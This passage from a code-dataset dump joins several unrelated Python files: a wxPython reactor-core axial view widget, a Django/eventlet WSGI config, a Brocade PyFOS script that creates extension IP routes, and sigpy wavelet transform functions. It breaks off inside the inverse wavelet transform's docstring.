#m ( assy_ndx, assy_col_or_row, axial_level, pin_col_or_row, node_addr )
#m #end if core is not None and core.coreMap is not None
#m
#m return result
#m #end FindCell
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.GetAnimationIndexes() -
#----------------------------------------------------------------------
def GetAnimationIndexes( self ):
"""Accessor for the list of indexes over which this widget can be
animated. Possible values are 'axial:detector', 'axial:pin', 'statepoint'.
@return list of indexes or None
"""
return ( 'statepoint', )
#end GetAnimationIndexes
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._GetAxialRanges() -
#----------------------------------------------------------------------
def _GetAxialRanges( self, *types ):
"""Resolves the axial range in the core.fluenceMesh.z that should be
displayed, given the current vertical zoom level (vertical zooming is not
yet applied) and the non-fluence dataset axial mesh.
Args:
types (list): 'core', 'fluence'
Returns:
dict: keys
cm_bottom: bottom level in cm
cm_top: top level in cm
core_bottom_ndx: core bottom index (if ``types`` includes 'core')
core_top_ndx: core top index (if ``types`` includes 'core')
fluence_bottom_ndx: fluence bottom index
(if ``types`` includes 'fluence')
fluence_top_ndx: fluence top index
(if ``types`` includes 'fluence')
"""
core = self.dmgr.GetCore()
axial_mesh = self.dmgr.GetAxialMesh2( mesh_type = 'all' )
# core_axial_mesh = self.dmgr.GetAxialMesh2( self.curDataSet, 'pin' )
# fluence_axial_mesh = self.dmgr.GetAxialMesh2( self.fluenceAddr.dataSetName, 'fluence' )
#top_ndx = min( self.cellRange[ 3 ] - 1, len( axial_mesh ) - 1 )
top_ndx = min( self.cellRange[ 3 ], len( axial_mesh ) - 1 )
bottom_ndx = max( self.cellRange[ 1 ], 0 )
cm_top = axial_mesh[ top_ndx ]
cm_bottom = axial_mesh[ bottom_ndx ]
result = { 'cm_bottom': cm_bottom, 'cm_top': cm_top }
if types:
if 'core' in types:
core_axial_mesh = self.dmgr.GetAxialMesh2( self.curDataSet, 'pin' )
result[ 'core_bottom_ndx' ] = \
self.dmgr.GetAxialMeshIndex( cm_bottom, self.curDataSet, 'pin' )
result[ 'core_top_ndx' ] = \
self.dmgr.GetAxialMeshIndex( cm_top, self.curDataSet, 'pin' )
if 'fluence' in types:
fluence_axial_mesh = self.dmgr.\
GetAxialMesh2( self.fluenceAddr.dataSetName, 'fluence' )
result[ 'fluence_bottom_ndx' ] = self.dmgr.GetAxialMeshIndex(
cm_bottom, self.fluenceAddr.dataSetName, 'fluence'
)
result[ 'fluence_top_ndx' ] = self.dmgr.\
GetAxialMeshIndex( cm_top, self.fluenceAddr.dataSetName, 'fluence' )
#end if types
return result
#end _GetAxialRanges
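  # Shape of the dict returned above, with illustrative (not real) values:
  #   { 'cm_bottom': 0.0, 'cm_top': 365.76,
  #     'core_bottom_ndx': 0, 'core_top_ndx': 48,
  #     'fluence_bottom_ndx': 0, 'fluence_top_ndx': 28 }
  # The '*_ndx' keys appear only when 'core' and/or 'fluence' are requested
  # via ``types``.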
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.GetDataSetTypes() -
#----------------------------------------------------------------------
def GetDataSetTypes( self ):
#return [ 'channel', 'pin', ':assembly', ':node' ]
return [ 'channel', 'pin', ':assembly' ]
#end GetDataSetTypes
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.GetEventLockSet() -
#----------------------------------------------------------------------
def GetEventLockSet( self ):
"""
"""
locks = set([
STATE_CHANGE_axialValue,
STATE_CHANGE_coordinates,
STATE_CHANGE_curDataSet,
STATE_CHANGE_fluenceAddr,
STATE_CHANGE_scaleMode,
STATE_CHANGE_timeValue
])
# STATE_CHANGE_stateIndex
return locks
#end GetEventLockSet
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.GetInitialCellRange() -
#----------------------------------------------------------------------
def GetInitialCellRange( self ):
"""Creates the range using y for the axial.
@return ( xy-left, z-bottom, xy-right+1, z-top+1, d-xy, dz )
"""
core = None
if self.dmgr is not None:
core = self.dmgr.GetCore()
if core is None:
result = ( 0, 0, 0, 0, 0, 0 )
else:
result = list( self.dmgr.ExtractSymmetryExtent() )
result[ 1 ] = 0
#mesh = self.dmgr.GetAxialMeshCenters2( self.curDataSet )
mesh = self.dmgr.GetAxialMeshCenters2( mesh_type = 'all' )
result[ 3 ] = result[ 5 ] = len( mesh )
return result
#end GetInitialCellRange
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.GetPrintFontScale() -
#----------------------------------------------------------------------
def GetPrintFontScale( self ):
"""
@return 1.0
"""
return 1.0
#end GetPrintFontScale
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.GetSpecialDataSetTypes() -
#----------------------------------------------------------------------
def GetSpecialDataSetTypes( self ):
"""Accessor specifying the types of special datasets which can be
processed in this widget. For now this is limited to 'fluence'.
@return [ 'fluence' ]
"""
return [ 'fluence' ]
#end GetSpecialDataSetTypes
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.GetTitle() -
#----------------------------------------------------------------------
def GetTitle( self ):
return 'Vessel Core Axial 2D View'
#end GetTitle
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.GetToolButtonDefs() -
#----------------------------------------------------------------------
#m def GetToolButtonDefs( self ):
#m """
#m"""
#m return self.toolButtonDefs
#m #end GetToolButtonDefs
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._HiliteBitmap() -
#----------------------------------------------------------------------
def _HiliteBitmap( self, bmap, config = None ):
result = bmap
if config is None:
config = self.config
core = self.dmgr.GetCore()
if config is not None and core is not None:
line_wd = -1
rect = None
rel_axial = self.axialValue.pinIndex - self.cellRange[ 1 ]
# if self.mode == 'xz':
# rel_cell = self.assemblyAddr[ 1 ] - self.cellRange[ 0 ]
# else:
# rel_cell = self.assemblyAddr[ 2 ] - self.cellRange[ 0 ]
rel_cell = 0
if rel_cell >= 0 and rel_cell < self.cellRange[ -2 ] and \
rel_axial >= 0 and rel_axial < self.cellRange[ -1 ]:
assy_wd = config[ 'assemblyWidth' ]
axial_levels_dy = config[ 'coreAxialLevelsDy' ]
core_region = config[ 'coreRegion' ]
line_wd = config[ 'lineWidth' ]
#pin_wd = config[ 'pinWidth' ]
axial_y = core_region[ 1 ]
for ax in range( len( axial_levels_dy ) - 1, rel_axial, -1 ):
axial_y += axial_levels_dy[ ax ]
rect = [
rel_cell * assy_wd + core_region[ 0 ], axial_y,
assy_wd, axial_levels_dy[ rel_axial ]
]
#end if selection w/in image
# -- Draw?
# --
if rect is not None:
new_bmap = self._CopyBitmap( bmap )
dc = wx.MemoryDC( new_bmap )
gc = wx.GraphicsContext.Create( dc )
gc.SetPen(
wx.ThePenList.FindOrCreatePen(
HILITE_COLOR_primary,
line_wd, wx.PENSTYLE_SOLID
)
)
path = gc.CreatePath()
path.AddRectangle( *rect )
gc.StrokePath( path )
dc.SelectObject( wx.NullBitmap )
result = new_bmap
#end if rect
#end if config
return result
#end _HiliteBitmap
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._InitEventHandlers() -
#----------------------------------------------------------------------
def _InitEventHandlers( self ):
"""
"""
#self._SetMode( 'core' )
self.bitmapCtrl.Bind( wx.EVT_CONTEXT_MENU, self._OnContextMenu )
#self.bitmapCtrl.Bind( wx.EVT_LEFT_DOWN, self._OnLeftDown )
self.bitmapCtrl.Bind( wx.EVT_LEFT_UP, self._OnLeftUp )
self.bitmapCtrl.Bind( wx.EVT_MOTION, self._OnMouseMotion )
#end _InitEventHandlers
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._IsAssemblyAware() -
#----------------------------------------------------------------------
def _IsAssemblyAware( self ):
"""
@return False
"""
return False
#end _IsAssemblyAware
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.IsTupleCurrent() -
#----------------------------------------------------------------------
def IsTupleCurrent( self, tpl ):
"""Compares tuple created with _CreateStateTuple( self ).
@param tpl tuple of state values
@return True if it matches the current state, false otherwise
"""
#m th = self.fluenceAddr.thetaIndex
#m if self.mode == 'xz':
#m t = ( self.stateIndex, self.assemblyAddr[ 2 ], self.subAddr[ 1 ], th )
#m else:
#m t = ( self.stateIndex, self.assemblyAddr[ 1 ], self.subAddr[ 0 ], th )
t = ( self.stateIndex, self.fluenceAddr.thetaIndex )
return tpl == t
#end IsTupleCurrent
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._LoadDataModelUI() -
#----------------------------------------------------------------------
def _LoadDataModelUI( self, reason ):
"""Updates self.angleSlider range based on coreSym.
Must be called on the UI thread.
"""
core = self.dmgr.GetCore()
r = ( 0, 359 ) if core is not None and core.coreSym == 1 else ( 0, 89 )
self.angleSlider.SetRange( *r )
self.angleSlider.SetValue( r[ 0 ] )
#end _LoadDataModelUI
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._LoadDataModelValues() -
#----------------------------------------------------------------------
def _LoadDataModelValues( self, reason ):
"""
"""
if (reason & STATE_CHANGE_coordinates) > 0:
self.assemblyAddr = self.state.assemblyAddr
self.subAddr = self.state.subAddr
if (reason & STATE_CHANGE_curDataSet) > 0:
self.curDataSet = self._FindFirstDataSet( self.state.curDataSet )
if (reason & STATE_CHANGE_fluenceAddr) > 0:
self.fluenceAddr.update( self.state.fluenceAddr )
self.fluenceAddr.dataSetName = \
self._FindFirstDataSet( self.fluenceAddr.dataSetName, ds_type = 'fluence' )
ds_type = self.dmgr.GetDataSetType( self.curDataSet )
self.channelMode = self.dmgr.IsChannelType( self.curDataSet )
self.nodalMode = self.dmgr.IsNodalType( ds_type )
#end _LoadDataModelValues
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.LoadProps() -
#----------------------------------------------------------------------
def LoadProps( self, props_dict ):
"""Called to load properties. This implementation is a noop and should
be overridden by subclasses.
@param props_dict dict object from which to deserialize properties
"""
#for k in ( 'assemblyAddr', 'auxNodeAddrs', 'nodeAddr', 'subAddr', 'mode' ):
for k in ( 'assemblyAddr', 'nodeAddr', 'subAddr' ):
if k in props_dict:
setattr( self, k, props_dict[ k ] )
super( VesselCoreAxial2DView, self ).LoadProps( props_dict )
#end LoadProps
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._OnAngleSlider() -
#----------------------------------------------------------------------
def _OnAngleSlider( self, ev ):
"""Handles events from the angle slider. Called on the UI thread.
"""
ev.Skip()
obj = ev.GetEventObject()
val = obj.GetValue()
self.GetTopLevelParent().GetApp().\
DoBusyEventOp( self._OnAngleSliderImpl, val )
#end _OnAngleSlider
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._OnAngleSliderImpl() -
#----------------------------------------------------------------------
def _OnAngleSliderImpl( self, val ):
"""Handles events from the angle slider. Called on the UI thread.
"""
core = self.dmgr.GetCore()
val_ndx = core.fluenceMesh.GetThetaIndex( val * math.pi / 180.0 )
if val_ndx >= 0 and val_ndx != self.fluenceAddr.thetaIndex:
fluence_addr = self.fluenceAddr.copy()
fluence_addr.update( thetaIndex = val_ndx )
self.FireStateChange( fluence_addr = fluence_addr )
#end _OnAngleSliderImpl
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._OnClick() -
#----------------------------------------------------------------------
def _OnClick( self, ev ):
"""
"""
x = ev.GetX()
y = ev.GetY()
self.GetTopLevelParent().GetApp().DoBusyEventOp( self._OnClickImpl, x, y )
#end _OnClick
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._OnClickImpl() -
#----------------------------------------------------------------------
def _OnClickImpl( self, x, y ):
"""
"""
valid = False
cell_info = self.FindCell( x, y )
if cell_info is not None:
valid = self.dmgr.IsValid(
self.curDataSet,
axial_level = cell_info[ 0 ],
assembly_index = cell_info[ 1 ]
)
if valid:
state_args = {}
state_args[ 'assembly_addr' ] = cell_info[ 1 : 4 ]
state_args[ 'axial_value' ] = self.dmgr.GetAxialValue(
self.curDataSet, core_ndx = cell_info[ 0 ]
)
self.FireStateChange( **state_args )
#end if valid
#end _OnClickImpl
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._OnFindMinMax() -
#----------------------------------------------------------------------
def _OnFindMinMax( self, mode, all_states_flag, all_assy_flag, ev ):
"""Calls _OnFindMinMaxPin().
"""
self.GetTopLevelParent().GetApp().DoBusyEventOp(
self._OnFindMinMaxImpl, mode, all_states_flag, all_assy_flag
)
#end _OnFindMinMax
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._OnFindMinMaxImpl() -
#----------------------------------------------------------------------
def _OnFindMinMaxImpl( self, mode, all_states_flag, all_assy_flag ):
"""Calls _OnFindMinMaxPin().
"""
if self.config and self.fluenceAddr and self.fluenceAddr.dataSetName:
self._OnFindMinMaxFluence(
mode, self.fluenceAddr, all_states_flag,
self.config.get( 'fluenceDataSetExpr' ),
self.config.get( 'radiusStartIndex', 0 )
)
#end _OnFindMinMaxImpl
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.SaveProps() -
#----------------------------------------------------------------------
def SaveProps( self, props_dict, for_drag = False ):
"""Called to save properties. Subclasses should override calling this
method via super.SaveProps().
@param props_dict dict object to which to serialize properties
"""
super( VesselCoreAxial2DView, self ).SaveProps( props_dict, for_drag = for_drag )
for k in ( 'assemblyAddr', 'nodeAddr', 'subAddr' ):
props_dict[ k ] = getattr( self, k )
#end SaveProps
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.SetDataSet() -
#----------------------------------------------------------------------
def SetDataSet( self, qds_name ):
"""May be called from any thread.
"""
ds_type = self.dmgr.GetDataSetType( qds_name )
if ds_type == 'fluence':
if qds_name != self.fluenceAddr.dataSetName:
self.fluenceAddr.SetDataSetName( qds_name )
wx.CallAfter( self.UpdateState, resized = True )
self.FireStateChange( fluence_addr = self.fluenceAddr )
elif qds_name != self.curDataSet:
wx.CallAfter( self.UpdateState, cur_dataset = qds_name )
self.FireStateChange( cur_dataset = qds_name )
#end SetDataSet
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.SetMode() -
#----------------------------------------------------------------------
#m def SetMode( self, mode, button = None ):
#m """May be called from any thread.
#m@param mode either 'xz' or 'yz', defaulting to the former on
#m any other value
#m@param button optional button to update
#m"""
#m if mode != self.mode:
#m self.mode = 'yz' if mode == 'yz' else 'xz'
#m self.cellRange = list( self.GetInitialCellRange() )
#m del self.cellRangeStack[ : ]
#m
#m wx.CallAfter( self._SetModeImpl, button )
#m #end SetMode
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._SetModeImpl() -
#----------------------------------------------------------------------
#m def _SetModeImpl( self, button = None ):
#m """Must be called from the event thread.
#m@param mode mode, already set
#m any other value
#m@param button optional button to update
#m"""
#m if button is None:
#m for ch in self.GetParent().GetControlPanel().GetChildren():
#m if isinstance( ch, wx.BitmapButton ) and \
#m ch.GetToolTip().GetTip().find( 'Toggle Slice' ) >= 0:
#m button = ch
#m break
#m #end if
#m
#m if button is not None:
#m if self.mode == 'yz':
#m bmap = Widget.GetBitmap( 'X_16x16' )
#m tip_str = 'Toggle Slice to X-Axis'
#m else:
#m bmap = Widget.GetBitmap( 'Y_16x16' )
#m tip_str = 'Toggle Slice to Y-Axis'
#m
#m button.SetBitmapLabel( bmap )
#m button.SetToolTip( wx.ToolTip( tip_str ) )
#m button.Update()
#m self.GetParent().GetControlPanel().Layout()
#m #end if
#m
#m self.Redraw()
#m #end _SetModeImpl
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._UpdateControls() -
#----------------------------------------------------------------------
def _UpdateControls( self ):
"""Must be called from the UI thread.
"""
core = self.dmgr.GetCore()
if self.angleSlider is not None and core is not None:
theta_deg = core.fluenceMesh.\
GetTheta( self.fluenceAddr.thetaIndex, center = False, units = 'deg' )
if theta_deg != self.angleSlider.GetValue():
self.angleSlider.SetValue( theta_deg )
#end _UpdateControls
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._UpdateDataSetStateValues() -
#----------------------------------------------------------------------
def _UpdateDataSetStateValues( self, ds_type, clear_zoom_stack = False ):
"""Updates channelmode and nodalMode properties.
Args:
ds_type (str): dataset category/type
clear_zoom_stack (boolean): True to clear the zoom stack
"""
self.cellRange = list( self.GetInitialCellRange() )
del self.cellRangeStack[ : ]
self.channelMode = self.dmgr.IsChannelType( self.curDataSet )
self.nodalMode = self.dmgr.IsNodalType( ds_type )
#end _UpdateDataSetStateValues
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._UpdateStateValues() -
#----------------------------------------------------------------------
def _UpdateStateValues( self, **kwargs ):
"""
@return kwargs with 'changed' and/or 'resized'
"""
kwargs = super( VesselCoreAxial2DView, self )._UpdateStateValues( **kwargs )
changed = kwargs.get( 'changed', False )
resized = kwargs.get( 'resized', False )
update_controls = False
core = self.dmgr.GetCore()
if 'assembly_addr' in kwargs and \
kwargs[ 'assembly_addr' ] != self.assemblyAddr:
changed = True
self.assemblyAddr = kwargs[ 'assembly_addr' ]
# if 'node_addr' in kwargs:
# node_addr = self.dmgr.NormalizeNodeAddr( kwargs[ 'node_addr' ] )
# if node_addr != self.nodeAddr:
# self.nodeAddr = node_addr
# if 'sub_addr' in kwargs and kwargs[ 'sub_addr' ] != self.subAddr:
# if kwargs[ 'sub_addr' ][ pin_ndx ] != self.subAddr[ pin_ndx ]:
# resized = True
# else:
# changed = True
# self.subAddr = self.dmgr.NormalizeSubAddr(
# kwargs[ 'sub_addr' ],
# 'channel' if self.channelMode else 'pin'
# )
# #end if 'sub_addr'
if 'fluence_addr' in kwargs and \
kwargs[ 'fluence_addr' ] != self.fluenceAddr:
resized = update_controls = True
self.fluenceAddr.update( self.state.fluenceAddr )
if 'weights_mode' in kwargs:
kwargs[ 'resized' ] = True
if update_controls or resized:
wx.CallAfter( self._UpdateControls )
if changed:
kwargs[ 'changed' ] = True
if resized:
kwargs[ 'resized' ] = True
return kwargs
#end _UpdateStateValues
#end VesselCoreAxial2DView
| 38.071061 | 119 | 0.547609 |
4a1f3fd0de8790a9d889edb92d8563c71e697f82 | 681 | py | Python | djangoxtermjs/wsgi.py | MahmoudAlyy/docker-django-ui | 1175aa06527e27c6f529afa6616165fddafd6290 | [
"MIT"
] | 1 | 2021-05-10T05:10:41.000Z | 2021-05-10T05:10:41.000Z | djangoxtermjs/wsgi.py | MahmoudAlyy/docker-django-ui | 1175aa06527e27c6f529afa6616165fddafd6290 | [
"MIT"
] | null | null | null | djangoxtermjs/wsgi.py | MahmoudAlyy/docker-django-ui | 1175aa06527e27c6f529afa6616165fddafd6290 | [
"MIT"
] | 1 | 2021-02-17T11:15:12.000Z | 2021-02-17T11:15:12.000Z | """
WSGI config for djangoxtermjs project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
os.environ['DJANGO_SETTINGS_MODULE'] = 'djangoxtermjs.settings'
import socketio
import eventlet
import eventlet.wsgi
from xterm.views import sio
from djangoxtermjs.settings import static_files
from django.core.wsgi import get_wsgi_application
django_app = get_wsgi_application()
#serve static file
application = socketio.WSGIApp(sio, django_app,static_files=static_files)
eventlet.wsgi.server(eventlet.listen(('', 8000)), application)
| 23.482759 | 78 | 0.800294 |
4a1f3fe8887ffea80dd1ac02a056c166f30f84f8 | 4,671 | py | Python | pyfos/utils/extension/extension_ip_route_create.py | brocade/pyfos | 33565cfc1401f5dc54a9a9fb70913c9a670cb322 | [
"Apache-2.0"
] | 44 | 2017-11-17T12:03:11.000Z | 2022-02-03T20:57:56.000Z | pyfos/utils/extension/extension_ip_route_create.py | brocade/pyfos | 33565cfc1401f5dc54a9a9fb70913c9a670cb322 | [
"Apache-2.0"
] | 13 | 2018-10-09T15:34:15.000Z | 2022-02-24T20:03:17.000Z | pyfos/utils/extension/extension_ip_route_create.py | brocade/pyfos | 33565cfc1401f5dc54a9a9fb70913c9a670cb322 | [
"Apache-2.0"
] | 23 | 2017-12-14T18:08:33.000Z | 2022-02-03T15:33:40.000Z | #!/usr/bin/env python3
# Copyright © 2018 Broadcom. All Rights Reserved. The term “Broadcom” refers to
# Broadcom Inc. and/or its subsidiaries.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may also obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`extension_ip_route_create` - PyFOS util for creating an IP route.
********************************************************************************
The :mod:`extension_ip_route_create` util is used to create an IP route.
This module is a stand-alone script that can be used to create an IP route.
extension_ip_route_create.py: Usage
* Infrastructure Options:
* -i,--ipaddr=IPADDR: The IP address of the FOS switch.
* -L,--login=LOGIN: The login name.
* -P,--password=PASSWORD: The password.
* -f,--vfid=VFID: The VFID to which the request is directed.
* -s,--secured=MODE: The HTTPS mode "self" or "CA" [Optional].
* -v,--verbose: Verbose mode [Optional].
* Util Script Options:
* -n,--name=NAME: Sets the name.
* -g,--ip-gateway=VALUE: Sets the IP gateway.
* -p,--ip-prefix-length=VALUE: Sets the IP prefix length.
* -d,--dp-id=VALUE: Sets the DP ID.
* --ip-address=VALUE: Sets the IP address.
* Output:
* Python dictionary content with RESTCONF response data.
.. function:: extension_ip_route_create.create_extension_ip_route(session,\
name, dp, ip, prefix, gateway)
*Create an Extension IP Route*
Example Usage of the Method::
ret = extension_ip_route_create.create_extension_ip_route(
session, name,dp, ip, prefix, gateway)
print (ret)
Details::
IProute = {
"name": name,
"dp-id": dp,
"ip-address": ip
"ip-prefix-length": prefix
"ip-gateway": gateway
}
result = extension_ip_route_create._create_extension_ip_route(
session, IProute)
* Input:
:param session: The session returned by the login.
:param name: Sets the GE_Port name expressed as slot/port.
:param dp-id: Sets the DP instance.
:param ip: Sets the extension IP address.
:param prefix: Sets the prefix length for the IP address.
:param gateway: Sets the IP address of the gateway.
* Output:
:rtype: A dictionary of return status matching the REST response.
*Use Cases*
Create a new extension IP route.
"""
import sys
from pyfos import pyfos_auth
from pyfos import pyfos_util
from pyfos.pyfos_brocade_extension_ip_route import extension_ip_route
from pyfos.utils import brcd_util
isHttps = "0"
def _create_extension_ip_route(session, iprouteobject):
result = iprouteobject.post(session)
return result
def create_extension_ip_route(session, name, dp, ip, prefix, gateway):
    value_dict = {'name': name, 'dp-id': dp, 'ip-address': ip,
                  'ip-prefix-length': prefix,
                  'ip-gateway': gateway}
iprouteobject = extension_ip_route(value_dict)
result = _create_extension_ip_route(session, iprouteobject)
return result
def validate(iprouteobject):
if iprouteobject.peek_name() is None or\
iprouteobject.peek_dp_id() is None or\
iprouteobject.peek_ip_prefix_length() is None or\
iprouteobject.peek_ip_address() is None or\
iprouteobject.peek_ip_gateway() is None:
return 1
return 0
def main(argv):
# myinput = str("-h -i 10.17.3.70 -n 4/17 -d 0 " +
# "--ip-address 154.10.10.0 " +
# "-g 134.10.10.25 -p 24 ")
# argv = myinput.split()
filters = ["name", "ip_prefix_length", "ip_address", "dp_id",
"ip_gateway"]
inputs = brcd_util.parse(argv, extension_ip_route, filters, validate)
iprouteobject = inputs['utilobject']
session = brcd_util.getsession(inputs)
result = _create_extension_ip_route(session, iprouteobject)
pyfos_util.response_print(result)
pyfos_auth.logout(session)
if __name__ == "__main__":
main(sys.argv[1:])
| 33.604317 | 80 | 0.633055 |
4a1f403cdc4b00d42d52e62b5118c937bbc66ca0 | 8,183 | py | Python | sigpy/wavelet.py | Phillistan16/sigpy | 4f83c7b7d4560f9f6fc169de301011f541a9be68 | [
"BSD-3-Clause"
] | null | null | null | sigpy/wavelet.py | Phillistan16/sigpy | 4f83c7b7d4560f9f6fc169de301011f541a9be68 | [
"BSD-3-Clause"
] | null | null | null | sigpy/wavelet.py | Phillistan16/sigpy | 4f83c7b7d4560f9f6fc169de301011f541a9be68 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""Wavelet transform functions.
"""
import numpy as np
import pywt
from sigpy import backend
__all__ = ['fwt', 'iwt']
def get_wavelet_shape(shape, wave_name, axes, level):
input = np.zeros(shape)
tmp = fwt(input, wave_name=wave_name, axes=axes, level=level)
return tmp.shape
def apply_dec_along_axis(input, axes, dec_lo, dec_hi, level, apply_zpad):
"""Apply wavelet decomposition along axes.
Helper function to recursively apply decomposition wavelet filters
along axes.
Args:
input (array): Input array.
axes (tuple of int): Axes to perform wavelet transform.
dec_lo (array): Wavelet coefficients for approximation coefficients.
dec_hi (array): Wavelet coefficients for decimation coefficients.
level (int): Level to determine amount of zero-padding.
apply_zpad (bool): Set to true to apply z-pad.
"""
assert type(axes) == tuple
assert dec_lo.shape == dec_hi.shape
if (len(axes) == 0):
return input
# Loading sigpy.
device = backend.get_device(input)
xp = device.xp
axis = axes[0]
# Zero padding.
x = input
if (apply_zpad):
pad_size = (1 + (dec_hi.size * level + x.shape[axis])//(2**level)) * \
2 ** level - x.shape[axis]
pad_array = [(0, pad_size) if k == axis else (0, 0)
for k in range(len(x.shape))]
x = xp.pad(x, pad_array, 'constant', constant_values=(0, 0))
# Fourier space.
X = xp.fft.fftn(x, axes=(axis,))
lo = xp.zeros((x.shape[axis],)).astype(xp.complex64)
lo[:dec_lo.size] = dec_lo
lo = xp.reshape(xp.fft.fftn(xp.roll(lo, -(dec_lo.size//2)), axes=(0,)),
[lo.size if k == axis else 1 for k in range(len(x.shape))])
hi = xp.zeros((x.shape[axis],)).astype(xp.complex64)
hi[:dec_hi.size] = dec_hi
hi = xp.reshape(xp.fft.fftn(xp.roll(hi, -(dec_hi.size//2)), axes=(0,)),
[hi.size if k == axis else 1 for k in range(len(x.shape))])
# Apply convolutions.
y_lo = xp.fft.ifftn(X * lo, axes=(axis,))
y_hi = xp.fft.ifftn(X * hi, axes=(axis,))
# Sub-sampling
y_lo = xp.take(y_lo, [t * 2 for t in range(0, y_lo.shape[axis]//2)],
axis=axis)
y_hi = xp.take(y_hi, [t * 2 for t in range(0, y_hi.shape[axis]//2)],
axis=axis)
# Apply recursion to other axis and concatenate.
return xp.concatenate((apply_dec_along_axis(y_lo, axes[1:], dec_lo,
dec_hi, level, apply_zpad),
apply_dec_along_axis(y_hi, axes[1:], dec_lo,
dec_hi, level, apply_zpad)), axis=axis)
def apply_rec_along_axis(input, axes, rec_lo, rec_hi):
"""Apply wavelet recomposition along axes.
Helper function to recursively apply decomposition wavelet filters
along axes. Assumes input has been appropriately zero-padded by
apply_dec_along_axis (used by fwt).
Args:
input (array): Input array.
axes (tuple of int): Axes to perform wavelet transform.
rec_lo (array): Wavelet coefficients for approximation coefficients.
rec_hi (array): Wavelet coefficients for decimation coefficients.
"""
assert type(axes) == tuple
assert rec_lo.shape == rec_hi.shape
if (len(axes) == 0):
return input
# Load sigpy.
device = backend.get_device(input)
xp = device.xp
axis = axes[0]
# Preparing filters.
lo = xp.zeros((input.shape[axis],)).astype(xp.complex64)
lo[:rec_lo.size] = rec_lo
lo = xp.reshape(xp.fft.fftn(xp.roll(lo, 1-(rec_lo.size//2)), axes=(0,)),
[lo.size if k == axis else 1
for k in range(len(input.shape))])
hi = xp.zeros((input.shape[axis],)).astype(xp.complex64)
hi[:rec_hi.size] = rec_hi
hi = xp.reshape(xp.fft.fftn(xp.roll(hi, 1-(rec_hi.size//2)), axes=(0,)),
[hi.size if k == axis else 1
for k in range(len(input.shape))])
# Coefficient indices.
lo_coeffs = tuple([slice(0, input.shape[k]//2)
if k == axis else slice(0, None)
for k in range(len(input.shape))])
hi_coeffs = tuple([slice(input.shape[k]//2, None)
if k == axis else slice(0, None)
for k in range(len(input.shape))])
# Extracting coefficients.
x_lo = xp.zeros(input.shape).astype(xp.complex64)
x_hi = xp.zeros(input.shape).astype(xp.complex64)
sample_idx = tuple([slice(0, None, 2)
if k == axis else slice(0, None)
for k in range(len(input.shape))])
x_lo[sample_idx] = input[lo_coeffs]
x_hi[sample_idx] = input[hi_coeffs]
# Apply convolutions.
X_lo = xp.fft.fftn(x_lo, axes=(axis,))
X_hi = xp.fft.fftn(x_hi, axes=(axis,))
y_lo = xp.fft.ifftn(X_lo * lo, axes=(axis,))
y_hi = xp.fft.ifftn(X_hi * hi, axes=(axis,))
# Apply recursion to other axis and concatenate.
return apply_rec_along_axis(y_lo + y_hi, axes[1:], rec_lo, rec_hi)
def fwt(input, wave_name='db4', axes=None, level=None, apply_zpad=True):
"""Forward wavelet transform.
Args:
input (array): Input array.
wave_name (str): Wavelet name.
axes (None or tuple of int): Axes to perform wavelet transform.
level (None or int): Number of wavelet levels.
apply_zpad (bool): If true, zero-pad for linear convolution.
"""
device = backend.get_device(input)
xp = device.xp
if axes is None:
axes = tuple([k for k in range(len(input.shape))
if input.shape[k] > 1])
if (type(axes) == int):
axes = (axes,)
wavdct = pywt.Wavelet(wave_name)
dec_lo = xp.array(wavdct.dec_lo)
dec_hi = xp.array(wavdct.dec_hi)
if level is None:
level = pywt.dwt_max_level(
xp.min(xp.array([input.shape[ax] for ax in axes])),
dec_lo.size)
if level <= 0:
return input
assert level > 0
y = apply_dec_along_axis(input, axes, dec_lo, dec_hi, level, apply_zpad)
approx_idx = tuple([slice(0, y.shape[k]//2)
if k in axes else slice(0, None)
for k in range(len(input.shape))])
y[approx_idx] = fwt(y[approx_idx], wave_name=wave_name,
axes=axes, level=level-1, apply_zpad=False)
return y
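# A minimal usage sketch (arbitrary example values; ``np`` is already
# imported above):
#
# x = np.random.randn(64, 64).astype(np.complex64)
# y = fwt(x, wave_name='db4', axes=(0, 1), level=2)
# # y is larger than x along the transformed axes because of the
# # zero-padding applied for linear convolution (see apply_zpad).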
def iwt(input, oshape, wave_name='db4', axes=None, level=None, inplace=False):
"""Inverse wavelet transform.
Args:
input (array): Input array.
